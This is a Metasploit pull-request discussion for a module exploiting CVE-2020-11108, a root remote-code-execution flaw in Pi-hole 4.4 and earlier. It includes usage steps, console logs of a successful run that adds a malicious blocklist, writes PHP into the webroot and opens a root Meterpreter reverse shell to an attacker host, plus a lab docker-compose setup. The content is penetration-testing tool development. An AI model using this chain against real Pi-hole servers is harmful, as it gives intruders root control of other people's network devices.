Pi-Hole <= 4.4 root RCE CVE-2020-11108

[h00die]

Root exploit against Pi-Hole <= 4.4 for cve-2020-11108.

Verified against 4.3.2, (modified code) and 4.4.

A few notes:

1. The writeup mentioned you should just run (our) web server on port 80. When putting in the blocklist w/ a different port, the various encodings muck with it before it gets to the RCE point. I didn't attempt to make this work.
2. Originally attempted to use /stage1 and /stage2 on the URLs for the blacklist, to track which was which. Similar to test #1 something got strange when getting to the RCE point, and it wouldn't work.
3. teleporter.php gets overwritten. I didn't bother pulling a 'good' one and then re-uploading it on shell.

Verification

Install a vuln pihole

• Start msfconsole
• use exploit/unix/http/pihole_blocklist_exec
• set rhost/srvhost/etc
• Verify you get a root exploit
• Document make sure its all grammar and spelling and good.

[bcoles]

Parenthesis will soon be mandatory.

[h00die]

Negative Test Cases

Correctly identifies 4.4 and 5.0

msf5 exploit(unix/http/pihole_blocklist_exec) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf5 exploit(unix/http/pihole_blocklist_exec) > [-] Version Detected: 4.4
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
check
[-] Version Detected: 5.0
[*] 2.2.2.2:80 - The target is not exploitable.

[h00die]

@Frichetten FYI. Do you want an email added to your POC for the exploit?

[Frichetten]

Hi @h00die, no thank you. I'm okay with just the link to my blog. If someone really wanted to contact me they could find the info there (I'm always nervous about an my email being in plaintext somewhere bots could find it and spam me).

Thank you for taking the time to build an actual Metasploit module for it! I never thought of doing that.

[Frichetten]

Also just a heads up that Pi-hole v4.4 is vulnerable. If you like I can take a stab at debugging it and seeing what's up. (Pi-hole Version v4.4, Web Interface Version v4.33, FTL Version v4.3.1)

[h00die]

@Frichetten thanks for writing an awesome blog with step by step instructions, and using python so I could actually follow along.

You were right on the 4.4, I adjusted the code a bit and got it working.

[h00die]

throwing a delay label on here to investigate authentication

[Frichetten]

Interesting. I’m not sure if 3.2.1 has authentication, but 4.4 does. When you install it will set a random one and the user can change it.

A quick/simple fix could be to ask for an authenticated session cookie from the user. Then just set ‘cookie = “PHPSESSID=user cookie”’

[h00die]

should be easy enough to add a password option, then send a post (or get then post for any csrf/tokens) to authenticate. I'll do a re-install of 3.2.1 and 4.4 and see if i can't find one. Now that the <3.3 exploit is up, I also wanted to do CVE-2020-8816, so a common library for authentication would be nice to have.

[h00die]

for notes, pihole 4.4, and 4.3.2 are strange in their logins.
They have no CSRF/token protection. Next, when you hit a page that requires auth, you don't get a redirect, it just gives you the login page content on the URL you specified. You send the POST to login to ANY URL (or at least i did it to the /admin/settings.php page) even though the traditional login page is /admin/index.php?login. It will then refresh the page with the appropriate content.

This is actually easier than expected, no token grabbing, no processing redirects etc.

[wvu]

Okay, Einstein.

[acammack-r7]

Nice module! Some small fixes to avoid nils and creating unneeded regexes.

[adfoster-r7]

Looks like a solid module, should be able to land this later 👍

---

Running check against 5.0

msf5 exploit(unix/http/pihole_blocklist_exec) > set verbose true
verbose => true
msf5 exploit(unix/http/pihole_blocklist_exec) > check

[-] Version Detected: 5.0
[*] 127.0.0.1:80 - The target is not exploitable.

Running check against 4.3

[+] Version Detected: 4.3
[*] 127.0.0.1:80 - The target appears to be vulnerable.

Running against 4.3 with a valid password

msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3
[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=fj7l5goh1hcs2ntmkb8gd3ipg2;
[*] Login required, attempting login.
[*] Using token: f9qnxBv48noc7Ym3wRCc9RDzNm/e51PWkXqZ8PQDgWQ=
[*] Adding backdoor reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (1/2) Sending priv esc trigger
[*] Adding root reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (2/2) Sending root payload
[*] Popping root shell
[*] Sending stage (38288 bytes) to 192.168.222.128
[*] Meterpreter session 3 opened (192.168.222.1:4444 -> 192.168.222.128:56936) at 2020-05-15 17:02:39 +0100
[+] Deleted YUQ1KxZP.php
sessions -1
[*] Starting interaction with 3...

meterpreter > 

Running against 4.3 with an invalid password

[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=kg1c6gkidtgv9gvutdmo0eefs2;
[*] Login required, attempting login.
[-] Exploit aborted due to failure: bad-config: Incorrect Password
[*] Server stopped.

This was my docker-compose file:

docker-compose.yml

version: "3"

# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3
    ports:
#      - "53:53/tcp"
#      - "53:53/udp"
#      - "67:67/udp"
      - "80:80/tcp"
#      - "443:443/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'password123'
    # Volumes store your data between container upgrades
    #volumes:
    #   - './etc-pihole/:/etc/pihole/'
    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    dns:
      - 127.0.0.1
      - 1.1.1.1
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

[h00die]

I'm hoping to write a 3rd pihole exploit in the next day or two. May make a cool weekly summary if all 3 land the same week 😉

[adfoster-r7]

Release Notes

This adds a root exploit for Pi-Hole, versions 4.4 and lower. This takes advantage of CVE-2020-11108. A new blocklist is added then an update is forced to pull in the blocklist content. Then PHP content is written to a file within webroot.